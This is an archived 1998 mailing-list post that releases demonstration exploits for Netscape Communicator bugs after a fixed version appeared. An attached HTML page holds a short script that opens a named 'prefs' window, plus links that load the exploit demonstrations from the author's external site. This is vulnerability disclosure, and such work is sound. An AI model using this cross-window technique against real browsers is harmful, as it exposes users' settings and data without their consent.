Communicator exploits

From: Fernand Portela (fernand.portelaat_private)
Date: Fri Apr 10 1998 - 05:06:08 PDT

    This is a multi-part message in MIME format.
    --------------C3265FC716C909831247B1CC
    Content-Type: text/plain; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    
    Hi,
    
    A few weeks ago, I posted to this mailing list an advisory about
    issues in Netscape Communicator. Since a fixed release (4.05) is now
    available to users, I think I can publish the exploits themselves.
    
    If you received this mail in Communicator 4.04 or previous (NN2.x and
    3.x are not vulnerable), simply click the links in the attached HTML
    document for a demonstration of the bugs.
    _______________________________________________________________________
    
    Fernand PORTELA                                               aka Nando
    fernand.portelaat_private                                nandoat_private
                                               http://www.mygale.org/~nando
    --------------C3265FC716C909831247B1CC
    Content-Type: text/html; charset=us-ascii; name="attacks.html"
    Content-Transfer-Encoding: 7bit
    Content-Disposition: inline; filename="attacks.html"
    
    <html>
    <head>
    <script><!--
    function load_page() {
      w = window.open( '', 'prefs' );
      w.origin = window.document.URL;
    }
    //--></script>
    </head>
    <body>
    <p>Click <a href="http://www.mygale.org/~nando/prefs3/" target="prefs" onClick="load_page()">here</a>
    for a demonstration of the first exploit.
    <p>Click <a href="http://www.mygale.org/~nando/prefs4/" target="prefs" onClick="load_page()">here</a>
    for a demonstration of the second exploit.
    </body>
    </html>
    
    
    --------------C3265FC716C909831247B1CC--
    


